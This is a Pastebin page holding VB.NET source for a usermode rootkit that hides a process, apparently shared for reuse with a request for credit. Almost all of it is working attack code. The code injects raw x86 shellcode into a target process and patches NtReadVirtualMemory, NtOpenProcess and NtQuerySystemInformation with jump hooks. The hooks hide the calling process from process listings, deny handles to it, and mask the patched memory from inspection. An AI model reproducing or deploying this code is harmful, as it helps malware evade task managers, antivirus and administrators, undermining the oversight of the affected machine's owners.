API tools faq
paste
Advertisement
Guest User

RootKit Hide Process [VB.NET] - SEMO.Pa3x

a guest
Apr 23rd, 2017
240
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VB.NET 14.19 KB | None | 0 0
raw download clone embed print report
  1. Module VbRootkit
  2.  
  3. '*****************
  4. 'CREATOR: Menalix
  5. 'SITE: **** (Removed due to unknowncheats.me rules)
  6. 'If used please give proper credits.
  7. '*****************
  8.  
  9. #Region "WinAPI's"
  10.  
  11. Private Declare Function CloseHandle Lib "kernel32" (ByVal pHandle As IntPtr) As Boolean
  12. Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Integer, ByVal bInheritHandle As Boolean, ByVal dwProcessId As UInteger) As IntPtr
  13. Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, <Runtime.InteropServices.Out()> ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByRef lpNumberOfBytesRead As UInteger) As Boolean
  14. Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByRef lpNumberOfBytesWritten As UInteger) As Boolean
  15. Private Declare Function VirtualProtectEx Lib "kernel32" (ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As UInteger, ByVal flNewProtect As UInteger, ByRef lpflOldProtect As UInteger) As Boolean
  16.  
  17. Private Declare Function Module32Next Lib "kernel32" (ByVal hSnapshot As IntPtr, ByRef lpme As MODULEENTRY32) As Boolean
  18. Private Declare Function Module32First Lib "kernel32" (ByVal hSnapshot As IntPtr, ByRef lpme As MODULEENTRY32) As Boolean
  19. Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal dwFlags As UInteger, ByVal u32ProcessId As UInteger) As IntPtr
  20.  
  21. Private Declare Function VirtualAllocEx Lib "kernel32" ( _
  22. ByVal hProcess As IntPtr, _
  23. ByVal lpAddress As IntPtr, _
  24. ByVal dwSize As UInteger, _
  25. ByVal flAllocationType As UInteger, _
  26. ByVal flProtect As UInteger) As IntPtr
  27.  
  28. #End Region
  29.  
  30. #Region "Structures"
  31.  
  32. Structure MODULEENTRY32
  33. Dim U32Size As UInteger
  34. Dim Th32ModuleId As UInteger
  35. Dim Th32ProcessId As UInteger
  36. Dim GlblcntUsage As UInteger
  37. Dim ProccntUsage As UInteger
  38. Dim ModBaseAddr As IntPtr
  39. Dim ModBaseSize As UInteger
  40. Dim HModule As IntPtr
  41. <Runtime.InteropServices.MarshalAs(Runtime.InteropServices.UnmanagedType.ByValTStr, SizeConst:=256)> Dim SzModule As String
  42. <Runtime.InteropServices.MarshalAs(Runtime.InteropServices.UnmanagedType.ByValTStr, SizeConst:=260)> Dim SzeExePath As String
  43. End Structure
  44.  
  45. #End Region
  46.  
  47.  
  48.  
  49. Private Function ReadMemoryByte(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal nSize As UInteger) As Byte()
  50.  
  51. Dim Buffer(CInt(nSize - 1)) As Byte
  52. ReadProcessMemory(hProcess, lpBaseAddress, Buffer, nSize, Nothing)
  53. Return Buffer
  54.  
  55. End Function
  56.  
  57. Private Function RemoteGetProcAddressManual(ByVal hProcess As IntPtr, ByVal ModuleAddress As UInteger, ByVal Export As String) As UInteger
  58.  
  59. 'PE Header relative declarations
  60. Dim PEHeaderOffset As UInteger = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(ModuleAddress + &H3C, IntPtr), 4), 0)
  61. Dim ExportRVA As UInteger = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(ModuleAddress + PEHeaderOffset + &H78, IntPtr), 4), 0)
  62. Dim IExportDir() As Byte = ReadMemoryByte(hProcess, CType(ModuleAddress + ExportRVA, IntPtr), 40)
  63. Dim NamesCnt As Integer = BitConverter.ToInt32(IExportDir, 24)
  64. Dim Names As UInteger = BitConverter.ToUInt32(IExportDir, 32) + ModuleAddress
  65. Dim FuncAddress As UInteger = BitConverter.ToUInt32(IExportDir, 28) + ModuleAddress
  66. Dim Ordinals As UInteger = BitConverter.ToUInt32(IExportDir, 36) + ModuleAddress
  67.  
  68. 'Empty declarations to use later
  69. Dim tpAddress, ApiAddress, Ord As UInteger
  70. Dim ApiString As String = Nothing
  71. Dim Ptr As IntPtr = Runtime.InteropServices.Marshal.AllocHGlobal(64)
  72.  
  73. 'Searching for the Export
  74. For i = 1 To NamesCnt
  75. tpAddress = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(Names + ((i - 1) * 4), IntPtr), 4), 0)
  76. Runtime.InteropServices.Marshal.Copy(ReadMemoryByte(hProcess, CType(ModuleAddress + tpAddress, IntPtr), 64), 0, Ptr, 64)
  77. ApiString = Runtime.InteropServices.Marshal.PtrToStringAnsi(Ptr)
  78. Ord = BitConverter.ToInt16(ReadMemoryByte(hProcess, CType(Ordinals + ((i - 1) * 2), IntPtr), 2), 0)
  79. ApiAddress = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(FuncAddress + (Ord * 4), IntPtr), 4), 0) + ModuleAddress
  80.  
  81. If String.Compare(ApiString, Export, True) = 0 Then
  82. Runtime.InteropServices.Marshal.FreeHGlobal(Ptr)
  83. Return ApiAddress
  84. End If
  85.  
  86. Next
  87.  
  88. Runtime.InteropServices.Marshal.FreeHGlobal(Ptr)
  89. Return Nothing
  90.  
  91. End Function
  92.  
  93. Private Function GetModuleBaseAddress(ByVal strProcess As String, ByVal strModule As String) As IntPtr
  94. Dim hSnapshot As IntPtr = CreateToolhelp32Snapshot(&H18, CUInt(Diagnostics.Process.GetProcessesByName(strProcess)(0).Id))
  95. If hSnapshot = Nothing Then Return Nothing
  96. Dim me32Modules As New MODULEENTRY32
  97. me32Modules.U32Size = CUInt(Runtime.InteropServices.Marshal.SizeOf(me32Modules))
  98. If Module32First(hSnapshot, me32Modules) Then
  99. Do
  100. If Not me32Modules.ModBaseAddr.ToInt64 > &H7FFFFFFF Then
  101. If String.Compare(strModule, me32Modules.SzModule, True) = 0 Then Return me32Modules.ModBaseAddr
  102. Else
  103. End If
  104. Loop While (Module32Next(hSnapshot, me32Modules))
  105. End If
  106. Return Nothing
  107. End Function
  108.  
  109. Private Function CalculateOffset(ByVal DesAddress As Integer, ByVal SrcAddress As Integer) As Integer
  110. Return (DesAddress - SrcAddress) - 5
  111. End Function
  112.  
  113. Sub HookApplication(ByVal ProcessName As String)
  114. Const VariablesSize As Integer = 96
  115. Dim ProcessHandle As IntPtr
  116. Dim MemoryBlockPtr As UInteger
  117. Dim Variables() As Byte = New Byte(VariablesSize) {}
  118. Dim fpGetProcessId As UInteger
  119. Dim fpGetCurrentProcessId As UInteger
  120. Dim lpProtectedAddress(3) As UInteger
  121. Dim ProtectedBuffer(3)() As Byte
  122. Dim OldProtect As UInteger = Nothing
  123. Dim WriteOffset As UInteger = Nothing
  124. Dim JmpOpCode() As Byte = {&HE9, Nothing, Nothing, Nothing, Nothing}
  125. Dim OpCodes()() As Byte = {NtReadVirtualMemory_AsmOpCode, NtOpenProcess_AsmOpCode, NtQuerySystemInformation_AsmOpCode}
  126. Dim OpCodesSize As UInteger = OpCodes(0).Length + OpCodes(1).Length + OpCodes(2).Length
  127.  
  128. 'Alloc memory for our opcode and variables
  129. ProcessHandle = OpenProcess(&H8 + &H10 + &H20, False, CUInt(Diagnostics.Process.GetProcessesByName(ProcessName)(0).Id))
  130. MemoryBlockPtr = CInt(VirtualAllocEx(ProcessHandle, Nothing, OpCodesSize + VariablesSize, &H3000, &H40))
  131.  
  132. 'Fill-in variables
  133. fpGetProcessId = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "kernel32.dll")), "GetProcessId"))
  134. fpGetCurrentProcessId = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "kernel32.dll")), "GetCurrentProcessId"))
  135. lpProtectedAddress(0) = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "ntdll.dll")), "NtReadVirtualMemory"))
  136. lpProtectedAddress(1) = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "ntdll.dll")), "NtOpenProcess"))
  137. lpProtectedAddress(2) = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "ntdll.dll")), "NtQuerySystemInformation"))
  138. ProtectedBuffer(0) = ReadMemoryByte(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), 24)
  139. ProtectedBuffer(1) = ReadMemoryByte(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), 24)
  140. ProtectedBuffer(2) = ReadMemoryByte(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), 24)
  141. BitConverter.GetBytes(fpGetProcessId).CopyTo(Variables, 0)
  142. BitConverter.GetBytes(fpGetCurrentProcessId).CopyTo(Variables, 4)
  143. BitConverter.GetBytes(Diagnostics.Process.GetCurrentProcess.Id).CopyTo(Variables, 8)
  144. BitConverter.GetBytes(lpProtectedAddress(0)).CopyTo(Variables, 12)
  145. BitConverter.GetBytes(lpProtectedAddress(1)).CopyTo(Variables, 16)
  146. BitConverter.GetBytes(lpProtectedAddress(2)).CopyTo(Variables, 20)
  147. ProtectedBuffer(0).CopyTo(Variables, 24)
  148. ProtectedBuffer(1).CopyTo(Variables, 24 + 24)
  149. ProtectedBuffer(2).CopyTo(Variables, 24 + 24 + 24)
  150.  
  151. 'Write variables and opcode to memory block
  152. WriteOffset = MemoryBlockPtr
  153. WriteProcessMemory(ProcessHandle, WriteOffset, Variables, VariablesSize, Nothing)
  154. WriteOffset += VariablesSize
  155. For i = 0 To OpCodes.Length - 1
  156. WriteProcessMemory(ProcessHandle, WriteOffset, OpCodes(i), CUInt(OpCodes(i).Length), Nothing)
  157. WriteOffset += OpCodes(i).Length
  158. Next
  159.  
  160. 'Set memory page to execute code
  161. VirtualProtectEx(ProcessHandle, MemoryBlockPtr, OpCodesSize + VariablesSize, &H10, 0)
  162.  
  163. 'Hook NtReadVirtualMemory
  164. WriteOffset = MemoryBlockPtr + VariablesSize
  165. BitConverter.GetBytes(CalculateOffset(WriteOffset, lpProtectedAddress(0))).CopyTo(JmpOpCode, 1)
  166. VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), CUInt(JmpOpCode.Length), &H40, OldProtect)
  167. WriteProcessMemory(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), JmpOpCode, CUInt(JmpOpCode.Length), Nothing)
  168. VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), CUInt(JmpOpCode.Length), OldProtect, 0)
  169.  
  170. 'Hook NtOpenProcess
  171. WriteOffset += OpCodes(0).Length
  172. BitConverter.GetBytes(CalculateOffset(WriteOffset, lpProtectedAddress(1))).CopyTo(JmpOpCode, 1)
  173. VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), CUInt(JmpOpCode.Length), &H40, OldProtect)
  174. WriteProcessMemory(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), JmpOpCode, CUInt(JmpOpCode.Length), Nothing)
  175. VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), CUInt(JmpOpCode.Length), OldProtect, 0)
  176.  
  177. 'Hook NtQuerySystemInformation
  178. WriteOffset += OpCodes(1).Length
  179. BitConverter.GetBytes(CalculateOffset(WriteOffset, lpProtectedAddress(2))).CopyTo(JmpOpCode, 1)
  180. VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), CUInt(JmpOpCode.Length), &H40, OldProtect)
  181. WriteProcessMemory(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), JmpOpCode, CUInt(JmpOpCode.Length), Nothing)
  182. VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), CUInt(JmpOpCode.Length), OldProtect, 0)
  183.  
  184. ' clean up
  185. CloseHandle(ProcessHandle)
  186.  
  187. End Sub
  188.  
  189. #Region "AsmOpCode"
  190.  
  191. Private NtReadVirtualMemory_AsmOpCode As Byte() = { _
  192. &H55, &H8B, &HEC, &H83, &HEC, &H14, &H56, &HC7, &H45, &HF8, &H1, &H0, &H0, &HC0, &HE8, &H0, _
  193. &H0, &H0, &H0, &H58, &H25, &H0, &HF0, &HFF, &HFF, &H89, &H45, &HFC, &HFF, &H75, &H18, &HFF, _
  194. &H75, &H14, &HFF, &H75, &H10, &HFF, &H75, &HC, &HFF, &H75, &H8, &H8B, &H45, &HFC, &H83, &HC0, _
  195. &H18, &HFF, &HD0, &H89, &H45, &HF8, &H83, &H7D, &HF8, &H0, &HF, &H8C, &HA8, &H0, &H0, &H0, _
  196. &HFF, &H75, &H8, &H8B, &H45, &HFC, &HFF, &H10, &H8B, &HF0, &H8B, &H45, &HFC, &HFF, &H50, &H4, _
  197. &H3B, &HF0, &H74, &HA, &H83, &H7D, &H8, &HFF, &HF, &H85, &H8A, &H0, &H0, &H0, &H83, &H65, _
  198. &HF4, &H0, &HEB, &H7, &H8B, &H45, &HF4, &H40, &H89, &H45, &HF4, &H83, &H7D, &HF4, &H3, &H73, _
  199. &H77, &H8B, &H45, &HF4, &H8B, &H4D, &HFC, &H83, &H7C, &H81, &HC, &H0, &H74, &H65, &H8B, &H45, _
  200. &HF4, &H8B, &H4D, &HFC, &H8B, &H44, &H81, &HC, &H3B, &H45, &HC, &H72, &H56, &H8B, &H45, &HC, _
  201. &H3, &H45, &H14, &H8B, &H4D, &HF4, &H8B, &H55, &HFC, &H39, &H44, &H8A, &HC, &H73, &H44, &H8B, _
  202. &H45, &HF4, &H8B, &H4D, &HFC, &H8B, &H44, &H81, &HC, &H2B, &H45, &HC, &H89, &H45, &HF0, &H83, _
  203. &H65, &HEC, &H0, &HEB, &H7, &H8B, &H45, &HEC, &H40, &H89, &H45, &HEC, &H83, &H7D, &HEC, &H18, _
  204. &H73, &H21, &H8B, &H45, &HF4, &H6B, &HC0, &H18, &H8B, &H4D, &HFC, &H8D, &H44, &H1, &H18, &H8B, _
  205. &H4D, &HEC, &H3, &H4D, &HF0, &H8B, &H55, &H10, &H8B, &H75, &HEC, &H8A, &H4, &H30, &H88, &H4, _
  206. &HA, &HEB, &HD2, &HE9, &H7C, &HFF, &HFF, &HFF, &H8B, &H45, &HF8, &H5E, &HC9, &HC2, &H14, &H0}
  207.  
  208. Private NtOpenProcess_AsmOpCode As Byte() = { _
  209. &H55, &H8B, &HEC, &H51, &H51, &HC7, &H45, &HF8, &H1, &H0, &H0, &HC0, &HE8, &H0, &H0, &H0, _
  210. &H0, &H58, &H25, &H0, &HF0, &HFF, &HFF, &H89, &H45, &HFC, &H83, &H7D, &H14, &H0, &H74, &H16, _
  211. &H8B, &H45, &H14, &H8B, &H4D, &HFC, &H8B, &H0, &H3B, &H41, &H8, &H75, &H9, &HC7, &H45, &HF8, _
  212. &H22, &H0, &H0, &HC0, &HEB, &H17, &HFF, &H75, &H14, &HFF, &H75, &H10, &HFF, &H75, &HC, &HFF, _
  213. &H75, &H8, &H8B, &H45, &HFC, &H83, &HC0, &H30, &HFF, &HD0, &H89, &H45, &HF8, &H8B, &H45, &HF8, _
  214. &HC9, &HC2, &H10, &H0}
  215.  
  216. Private NtQuerySystemInformation_AsmOpCode As Byte() = { _
  217. &H55, &H8B, &HEC, &H83, &HEC, &H1C, &H56, &H57, &HC7, &H45, &HEC, &H1, &H0, &H0, &HC0, &HE8, _
  218. &H0, &H0, &H0, &H0, &H58, &H25, &H0, &HF0, &HFF, &HFF, &H89, &H45, &HF0, &HFF, &H75, &H14, _
  219. &HFF, &H75, &H10, &HFF, &H75, &HC, &HFF, &H75, &H8, &H8B, &H45, &HF0, &H83, &HC0, &H48, &HFF, _
  220. &HD0, &H89, &H45, &HEC, &H83, &H7D, &HEC, &H0, &HF, &H8C, &H4E, &H1, &H0, &H0, &H83, &H7D, _
  221. &H8, &H5, &H75, &H5D, &H83, &H65, &HF8, &H0, &H8B, &H45, &HC, &H89, &H45, &HF4, &H8B, &H45, _
  222. &HF4, &H83, &H38, &H0, &H74, &H46, &H8B, &H45, &HF4, &H89, &H45, &HF8, &H8B, &H45, &HF8, &H8B, _
  223. &H4D, &HF8, &H3, &H8, &H89, &H4D, &HF4, &H8B, &H45, &HF4, &H8B, &H4D, &HF0, &H8B, &H40, &H44, _
  224. &H3B, &H41, &H8, &H75, &H25, &H8B, &H45, &HF4, &H83, &H38, &H0, &H75, &H8, &H8B, &H45, &HF8, _
  225. &H83, &H20, &H0, &HEB, &HF, &H8B, &H45, &HF8, &H8B, &H0, &H8B, &H4D, &HF4, &H3, &H1, &H8B, _
  226. &H4D, &HF8, &H89, &H1, &H8B, &H45, &HF8, &H89, &H45, &HF4, &HEB, &HB2, &HE9, &HEB, &H0, &H0, _
  227. &H0, &H83, &H7D, &H8, &H10, &HF, &H85, &HE1, &H0, &H0, &H0, &H8B, &H45, &HC, &H89, &H45, _
  228. &HFC, &H83, &H65, &HE8, &H0, &HEB, &H7, &H8B, &H45, &HE8, &H40, &H89, &H45, &HE8, &H8B, &H45, _
  229. &HFC, &H8B, &H4D, &HE8, &H3B, &H8, &HF, &H83, &HC0, &H0, &H0, &H0, &H8B, &H45, &HE8, &HC1, _
  230. &HE0, &H4, &H8B, &H4D, &HFC, &H8B, &H55, &HF0, &H8B, &H44, &H1, &H4, &H3B, &H42, &H8, &HF, _
  231. &H85, &HA2, &H0, &H0, &H0, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &HC6, &H44, _
  232. &H1, &H9, &H0, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H83, &H64, &H1, &H10, _
  233. &H0, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H33, &HC9, &H8B, &H55, &HFC, &H66, &H89, &H4C, &H2, _
  234. &HA, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H83, &H64, &H1, &HC, &H0, &H8B, _
  235. &H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &HC6, &H44, &H1, &H8, &H0, &H8B, &H45, &HE8, _
  236. &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H83, &H64, &H1, &H4, &H0, &H8B, &H45, &HE8, &H89, &H45, _
  237. &HE4, &HEB, &H7, &H8B, &H45, &HE4, &H40, &H89, &H45, &HE4, &H8B, &H45, &HFC, &H8B, &H4D, &HE4, _
  238. &H3B, &H8, &H73, &H21, &H8B, &H45, &HE4, &H40, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H8D, &H74, _
  239. &H1, &H4, &H8B, &H45, &HE4, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H8D, &H7C, &H1, &H4, &HA5, _
  240. &HA5, &HA5, &HA5, &HEB, &HCE, &H8B, &H45, &HFC, &H8B, &H0, &H48, &H8B, &H4D, &HFC, &H89, &H1, _
  241. &H8B, &H45, &HE8, &H48, &H89, &H45, &HE8, &HE9, &H2B, &HFF, &HFF, &HFF, &H8B, &H45, &HEC, &H5F, _
  242. &H5E, &HC9, &HC2, &H10, &H0}
  243.  
  244. #End Region
  245.  
  246. End Module
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!